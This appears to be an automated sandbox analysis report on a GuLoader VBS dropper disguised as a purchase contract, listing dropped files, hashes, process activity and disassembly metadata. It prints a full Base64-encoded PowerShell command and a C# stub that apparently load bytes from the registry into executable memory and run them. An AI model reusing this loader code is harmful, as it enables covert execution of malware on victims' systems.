                SHA-512:136AE87623D223CCA114A472897E28B4E663BBF9612F3E232B564DDBCCADD0D7F57A5EEDC7521267F7D4BDDEC469B10963AFAA7FE2BD27537F83BFDBD1612E09
                Malicious:false
                Preview:.using System;..using System.Runtime.InteropServices;..public static class SYDYEMENIT1..{..[DllImport("ntdll.dll")]public static extern int NtAllocateVirtualMemory(int SYDYEMENIT6,ref Int32 Natur9,int seru,ref Int32 SYDYEMENIT,int adju,int SYDYEMENIT7);..[DllImport("user32.dll")]public static extern IntPtr CallWindowProcW(uint seru5,int seru6,int seru7,int seru8,int seru9);..[DllImport("kernel32.dll")]public static extern void RtlMoveMemory(IntPtr seru1,ref Int32 seru2,int seru3);..}

                C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):375
                Entropy (8bit):5.167077461780711
                Encrypted:false
                SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fKT7ShGzxs7+AEszIN723fKT7Shb:p37Lvkmb6K2ayT7SkWZETayT7Sh
                MD5:F51709B660769C5A6D24A77C2713B8DD
                SHA1:54F95ED0DCB25E8EAAC31EBB1F16D84B78D12CE3
                SHA-256:B2239B636A6ECE195DDC68CB33CBD00D3D4664F5926EF0B9B02834F50F44B35E
                SHA-512:2F6D95A84770A6888743036B73D9CDCE22D8B63327DC184D0E335AA5F49128EAED3F0EFD73A615D55FA5F2A9D37C8D1ABD5A725A637F6D8E12DF2A18C31689D7
                Malicious:false
                Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.0.cs"

                C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll

                Download File
                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):3584
                Entropy (8bit):2.822015607551872
                Encrypted:false
                SSDEEP:48:6Ebjculb52Kql4QF9Bh+bB1ulW6a3Jhq:tjTlj4Mb6I6KJ
                MD5:C89CA164F91806FC6CD720DCB1639020
                SHA1:05C816C875AFA744A47B478D84B475CD077B9DFD
                SHA-256:BAF76CC4091AF701AE37AB4306513D2645B8C574BC684D89516EE65FC7748BD3
                SHA-512:26AA7FD7AFEDCEE559CBEFBE13DD89AA9586AAF9A7EAC5C8BEA33938DE83ACC736D9A07EA4C0152615EE4C26F8BE3ADA7E2DEA8EC4D5C28AC9BA51FA60992500
                Malicious:false
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a...........!.................$... ...@....... ....................................@.................................4$..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p$......H.......P ..............................................................BSJB............v4.0.30319......l...h...#~..........#Strings....l.......#US.t.......#GUID.......`...#Blob...........G.........%3............................................................3.,...............`.A.................................... :............ R............ b.........p.....|.............................................................................'.....,.!...0.....5.....>.s.}.......:...

                C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.out

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                Category:modified
                Size (bytes):876
                Entropy (8bit):5.279994811624406
                Encrypted:false
                SSDEEP:24:KOuqd3ka6K2abETaGKaM5DqBVKVrdFAMBJTH:yika6CbE+GKxDcVKdBJj
                MD5:A7E8A5B7CF6BF7429048FF556BC26DF2
                SHA1:6386089365DB04C3EA2F64D1D40D2FC45B6BB57A
                SHA-256:9A0D035F647943A3FC22471BC08AB12AE7120D8ABAB7150C08088B0F7F6A0FA0
                SHA-512:79A101445563B976C097530C549A9135F6D7EF2AB33679DDA5E1B1C0FA6A830F9500DFA9FBA8E9BCF0A95A57A948D0EA1CF21A79B953835B997E8C2870852BBF
                Malicious:false
                Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                C:\Users\user\Documents\20220126\PowerShell_transcript.813435.4Hmbfafm.20220126150134.txt

                Download File
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                Category:dropped
                Size (bytes):11548
                Entropy (8bit):5.195439260420691
                Encrypted:false
                SSDEEP:96:BZhTLSNnSm1TrwMFFyd1sXniC2JQwLkT14Nb84UdYoLbqDo1ZhZBTLSNnSm1Trw5:ghS2nljiNbpoihS2nljiNbpozMfkoLrz
                MD5:20F10E2B7E09DE3D7C26D563B062E59C
                SHA1:681CC3ECD89789721C2E973410BD89D74C0221B9
                SHA-256:330D80522C9691DAFB1ADC78FEAC832818D9E0EBAEBD5C456F7E5F3D1BC70945
                SHA-512:CBB70E9A7D6CF524E706ECA43DCF1762F77576E78CE60A3F87A79CB5B67CD0575525BEDB993439D4BA15B6A772C07FC18B0A57D1B16D5E3AFC7BED34A719816A
                Malicious:false
                Preview:.**********************..Windows PowerShell transcript start..Start time: 20220126150156..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813435 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoExit -EncodedCommand IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgB

                Static File Info

                General

                File type:ASCII text, with CRLF line terminators
                Entropy (8bit):5.18100071720658
                TrID:
                  File name:tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs
                  File size:91200
                  MD5:b8fbb413a49b2f05872cb38372454664
                  SHA1:2071d3476c94b3cfc924b31c705806e78df674a8
                  SHA256:cffa320db9834e3f224aa5961073fc9d0cb14f34c6430ffa2d7468da7da7ce32
                  SHA512:0145657682bbd7ba45f2c8f512ee11553ebaf20eeffb47f271f0e1b7e5882248488509e5ba6a789ef41d60e76acbb7a94110491a592359b2db4671f1bc3d759f
                  SSDEEP:1536:co8xz3WxNqaStVyjKT9MYxFc87GPm3Uggbnins:clxz3WbmdSYxFJagBgbis
                  File Content Preview:'benedick snee Bandanasd4 Parasitadr brontean Udtry Jvningern1 mhorrco thoriated kult Nunti stnke Antiparab ROVSING PALEOANTH udfordring TUNGM KRONPRINS precon TEGNING Ablatitio ESOTE STVN ..'strans Unca5 CAPRIFI Obbligato1 isce Raiiformn2 Bluchersbi6 Ren

                  File Icon

                  Icon Hash:e8d69ece869a9ec4

                  Network Behavior

                  No network behavior found

                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:1
                  Start time:15:01:14
                  Start date:26/01/2022
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\tregrene-KaufVertraeg-JoachimSvensson-23564334.vbs"
                  Imagebase:0x7ff62b150000
                  File size:163840 bytes
                  MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:5
                  Start time:15:01:26
                  Start date:26/01/2022
                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "IwBlAHIAaAB2AGUAcgB2AHMAawB1ACAATABlAGoAZQBzAHYAZQBuAGQAZQA5ACAAQQByAGMAaABhAGkAOAAgAFMAYQBnAHMAIABkAHIAbwBzAGgAawBpAGUAcwBoACAAbABhAG4AZABzAGsAYQAgAHcAaQB0AGMAaABiAGUAbAAgAEgAeQBkAHIAYQBuAHQAIABTAGMAdQBsAGwAcwBiAGEAIABhAGkAcgBiAHUAcgBzAHQAdQAgAHIAZQB0AHIAaQBiAHUAdABvACAAZABhAGcAcABhAGEAZgB1ACAAVQBQAFQASABSACAAbQBvAHIAcABpAG8AbgBmACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABOAGEAdAB1AHIAOQAsAGkAbgB0ACAAcwBlAHIAdQAsAHIAZQBmACAASQBuAHQAMwAyACAAUwBZAEQAWQBFAE0ARQBOAEkAVAAsAGkAbgB0ACAAYQBkAGoAdQAsAGkAbgB0ACAAUwBZAEQAWQBFAE0ARQBOAEkAVAA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgAdQBpAG4AdAAgAHMAZQByAHUANQAsAGkAbgB0ACAAcwBlAHIAdQA2ACwAaQBuAHQAIABzAGUAcgB1ADcALABpAG4AdAAgAHMAZQByAHUAOAAsAGkAbgB0ACAAcwBlAHIAdQA5ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAdgBvAGkAZAAgAFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKABJAG4AdABQAHQAcgAgAHMAZQByAHUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAcwBlAHIAdQAyACwAaQBuAHQAIABzAGUAcgB1ADMAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAZgBlAHIAbgAgAEMAQQBNAFAASABJAFIARQAgAEYASgBFAEQAUgBFAE4AIABDAEEAUABTAEkAQwBJAE4AIABTAGMAYQByAGYAZQBkAGUAbgB0ACAASQBuAHQAZQA5ACAAQQBaAFkATQAgAEYASQBHAFUAUgAgAEEAZgBnAGkAZgB0AHMAbgAzACAAdQBuAHQAaABvAHIAbgBsACAAUwBhAHUAcwBzADMAIABOAE8ATABFACAASABlAGUAZABsAGUAcwBzAGIAIABNAEkATgBFAFIAQQAgAFYAaQBuAGQAZAByAGUAdgBlAHQAIABPAFAASABJAEQASQBPACAATQBBAEcATgBFAFQASQBTAEUAIABnAGEAbAB2ACAAbQBpAGwAdABlAG4AZQBzACAAWABFAE4ATwAgAEEAbABsAGUANQAgAG4AbwBuAG0AbwBuAGkAcwB0ACAAIAANAAoAJABTAFkARABZAEUATQBFAE4ASQBUADMAPQAwADsADQAKACQAUwBZAEQAWQBFAE0ARQBOAEkAVAA5AD0AMQAwADQAOAA1ADcANgA7AA0ACgAkAFMAWQBEAFkARQBNAEUATgBJAFQAOAA9AFsAUwBZAEQAWQBFAE0ARQBOAEkAVAAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsADAALABbAHIAZQBmAF0AJABTAFkARABZAEUATQBFAE4ASQBUADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAHQAZQBuAGYAPQAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAEMAbABpAHAAIgApAC4ATwBuAGUADQAKAA0ACgAkAFQAQQBMAEEAUgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBbAF0AXQA6ADoAQwByAGUAYQB0AGUASQBuAHMAdABhAG4AYwBlACgAWwBTAHkAcwB0AGUAbQAuAEIAeQB0AGUAXQAsACQAUwB0AGUAbgBmAC4ATABlAG4AZwB0AGgAIAAvACAAMgApAA0ACgANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABTAHQAZQBuAGYALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAVABBAEwAQQBSAFsAJABpAC8AMgBdACAAPQAgAFsAYwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgB5AHQAZQAoACQAUwB0AGUAbgBmAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQATAB5AGsAawBlAGQAcgBtAGIAPQAwADsAIAAkAEwAeQBrAGsAZQBkAHIAbQBiACAALQBsAHQAIAAkAFQAQQBMAEEAUgAuAGMAbwB1AG4AdAAgADsAIAAkAEwAeQBrAGsAZQBkAHIAbQBiACsAKwApAA0ACgB7AA0ACgAJAA0ACgBbAFMAWQBEAFkARQBNAEUATgBJAFQAMQBdADoAOgBSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgAJABTAFkARABZAEUATQBFAE4ASQBUADMAKwAkAEwAeQBrAGsAZQBkAHIAbQBiACwAWwByAGUAZgBdACQAVABBAEwAQQBSAFsAJABMAHkAawBrAGUAZAByAG0AYgBdACwAMQApAA0ACgANAAoAfQANAAoAWwBTAFkARABZAEUATQBFAE4ASQBUADEAXQA6ADoAQwBhAGwAbABXAGkAbgBkAG8AdwBQAHIAbwBjAFcAKAAkAFMAWQBEAFkARQBNAEUATgBJAFQAMwAsACAAMAAsADAALAAwACwAMAApAA0ACgANAAoADQAKAA==
                  Imagebase:0xd30000
                  File size:430592 bytes
                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.893175053.00000000099B0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:high

                  General

                  Target ID:6
                  Start time:15:01:27
                  Start date:26/01/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:18
                  Start time:15:02:28
                  Start date:26/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ejetful0\ejetful0.cmdline
                  Imagebase:0x3b0000
                  File size:2170976 bytes
                  MD5 hash:350C52F71BDED7B99668585C15D70EEA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Reputation:moderate

                  General

                  Target ID:19
                  Start time:15:02:31
                  Start date:26/01/2022
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA312.tmp" "c:\Users\user\AppData\Local\Temp\ejetful0\CSCD17B7A03BBAF4362BE5E7ED8FAA386CE.TMP"
                  Imagebase:0xbe0000
                  File size:43176 bytes
                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate

                  Disassembly

                  Reset < >

                    Executed Functions

                    Function 082C7290 Relevance: 33.2, Strings: 25, Instructions: 1919COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$D!m$\m$\m$\m$\m
                    • API String ID: 0-240317922
                    • Opcode ID: d6381240016cee4fe37646033ad413f6735f880a3acec93b5246ff45db1a5d73
                    • Instruction ID: 84a8853674f089cd0f8fb9144ca06ae7b90049bf6fd052c71043665611d140dc
                    • Opcode Fuzzy Hash: d6381240016cee4fe37646033ad413f6735f880a3acec93b5246ff45db1a5d73
                    • Instruction Fuzzy Hash: DC031C7590011C9FCB65DFA0C854BDE77BAEF85308F2045E9D14A6B2A8DF706E848F62
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 082CBB68 Relevance: 4.9, Strings: 3, Instructions: 1196COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: D!m$D!m$\m
                    • API String ID: 0-1212028614
                    • Opcode ID: 264be2820755f34fb20a62c788a2c505c29976473d40cbd9ad70e40fb75bde63
                    • Instruction ID: 2aeb6c6a5c1495427c652fdc855a930f0afdbcba284e1b7476c01213e4301355
                    • Opcode Fuzzy Hash: 264be2820755f34fb20a62c788a2c505c29976473d40cbd9ad70e40fb75bde63
                    • Instruction Fuzzy Hash: 2FB25174A402159FDB24DB68CC61BADB7B6FFC9301F018599E50ABB394CA716D80CF64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03272019 Relevance: 4.6, Strings: 3, Instructions: 899COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: <m$p\}l$p\}l
                    • API String ID: 0-1355642730
                    • Opcode ID: fb4f83f3837ee6961ff299a491d1a06574d654b22b09dada0662ece639489055
                    • Instruction ID: 7c2ddce74b4e54cc175e34be8466d242363829e9317b4d1b9469b477f6031e4b
                    • Opcode Fuzzy Hash: fb4f83f3837ee6961ff299a491d1a06574d654b22b09dada0662ece639489055
                    • Instruction Fuzzy Hash: F6820A34A10215DFDB14DF68D594A9EB7F6BF88304F158999E809AB365DB30EC81CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0327CE38 Relevance: 2.1, Strings: 1, Instructions: 840COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: <m
                    • API String ID: 0-1662322675
                    • Opcode ID: f8f55bf3bb7decb39ddd2982e45c55e3acd2cc9a530de7a70496e92056e77d9a
                    • Instruction ID: 72245b555151cef967c9c99b3d23c7b252cc4327e48e519b16535b781df860a2
                    • Opcode Fuzzy Hash: f8f55bf3bb7decb39ddd2982e45c55e3acd2cc9a530de7a70496e92056e77d9a
                    • Instruction Fuzzy Hash: E0623B34B101058FCB04EF68C494A6EB7F6FF88714B2585A9E606DB365DB74EC42CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03271938 Relevance: 1.8, Strings: 1, Instructions: 575COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: ,Hm
                    • API String ID: 0-2337886773
                    • Opcode ID: 692ec30c18cf577311c0d405170e6b25196a5874040f40c15c3268ad650b4b48
                    • Instruction ID: 1bd541bc223d53e8131a7d9d10753a2a93ef4d22e84fde60ed39cfd8e87bb892
                    • Opcode Fuzzy Hash: 692ec30c18cf577311c0d405170e6b25196a5874040f40c15c3268ad650b4b48
                    • Instruction Fuzzy Hash: 051280757002058FDB14DF68C894AAEB7EAEFC8204F158469E906DB3A5DF30EC41CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 082CEBB0 Relevance: .8, Instructions: 787COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.888013537.00000000082C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082C0000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7e153a2aad10607a715dfa2c604ea5fbb21adf6b222da4a5479c6076012fa0dd
                    • Instruction ID: 59073c28aa01580b452fb292ad2e39d9ba926ab483f1b72ff1cc478666c6d4e4
                    • Opcode Fuzzy Hash: 7e153a2aad10607a715dfa2c604ea5fbb21adf6b222da4a5479c6076012fa0dd
                    • Instruction Fuzzy Hash: 1D628034600209CFDB14DF64D850BAAB7B6FF89305F1286ADE9099B2A0DB75DD41CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0327D928 Relevance: 1.6, Strings: 1, Instructions: 347COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: W
                    • API String ID: 0-655174618
                    • Opcode ID: e86a92044bec0cd68c6d53cbb080de5e4922499695b7072609ae0d3891e9e4cf
                    • Instruction ID: 6700c04548a58105176d11381664cf61a7f68bb687ca6752ca7580643fdaa0f8
                    • Opcode Fuzzy Hash: e86a92044bec0cd68c6d53cbb080de5e4922499695b7072609ae0d3891e9e4cf
                    • Instruction Fuzzy Hash: 4FC18C757142118FC704DF69D494AA9BBF5FF89320B1A85AAE449DB3A2CB31EC41CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03271018 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID: s
                    • API String ID: 0-16144311
                    • Opcode ID: 236f53a66f6e37ab34e8c94438e259ca91d5c00796cb6ff69abd56d35be512c1
                    • Instruction ID: d002542bd105afe9a57640166a7742f8fb3de2de518f44720210ec020e183e25
                    • Opcode Fuzzy Hash: 236f53a66f6e37ab34e8c94438e259ca91d5c00796cb6ff69abd56d35be512c1
                    • Instruction Fuzzy Hash: 52C14E74B1020A9FDB04EFA4D894AAEB7F6FF88204F148469D505AB7A5DF30EC45CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 08241F38 Relevance: .8, Instructions: 774COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.887921924.0000000008240000.00000040.00000800.00020000.00000000.sdmp, Offset: 08240000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c1a3092e03754530c7dcda69a41e4ecf2f2f351ef2091d9599cc8844cc84ec9b
                    • Instruction ID: e52ab297854cacdbf087b975b21c0d7445a499819c3d0bd68632bebea7dc3646
                    • Opcode Fuzzy Hash: c1a3092e03754530c7dcda69a41e4ecf2f2f351ef2091d9599cc8844cc84ec9b
                    • Instruction Fuzzy Hash: 14426A71714341CFDB188BAA84106AABBE6EFD5216F14C06EE54ACB256DB72CC43C7B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03274829 Relevance: .8, Instructions: 769COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4216b84ea2d9d3eb44a371d3d7a7e8595c9ead10d0625fd96ebba006294a1204
                    • Instruction ID: 88d097866844361fb7b47ddda9e549db759cd51df47aa32a7ea464d0c5bb64dc
                    • Opcode Fuzzy Hash: 4216b84ea2d9d3eb44a371d3d7a7e8595c9ead10d0625fd96ebba006294a1204
                    • Instruction Fuzzy Hash: 90829F74E012298FDBA5DF68C894B9DBBF5BB89304F1081EA940DE7350EB309E858F51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 08241678 Relevance: .7, Instructions: 711COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.887921924.0000000008240000.00000040.00000800.00020000.00000000.sdmp, Offset: 08240000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a049a8765f2245420bf8386523024ab9328ff8b48e60d9ad4822fcd3dadde169
                    • Instruction ID: c3caf2e406fbcac4f8e92a6c709b9f6aacc0e0b41a970d7ea9b11376aa9661ea
                    • Opcode Fuzzy Hash: a049a8765f2245420bf8386523024ab9328ff8b48e60d9ad4822fcd3dadde169
                    • Instruction Fuzzy Hash: 11322975714351DFCB198B78C8106AABBE6AFC5216F18846EC446CF291EB72C893C7B1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03273588 Relevance: .5, Instructions: 454COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8907188ca8070b326b96c510a825e1ddbcaadd05386660d18c2f1d57ba0886f0
                    • Instruction ID: 710bc530c65898938158458f8a5f3b3c8a41871ccd18deb792412ad35f8f0ae9
                    • Opcode Fuzzy Hash: 8907188ca8070b326b96c510a825e1ddbcaadd05386660d18c2f1d57ba0886f0
                    • Instruction Fuzzy Hash: A2121578A102499FCB05DF98C884AEEBBF6FF48314F248559E905AB361C735EC81DB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 03270040 Relevance: .3, Instructions: 337COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000005.00000002.875434822.0000000003270000.00000040.00000800.00020000.00000000.sdmp, Offset: 03270000, based on PE: false
                    Similarity
                    • API ID:
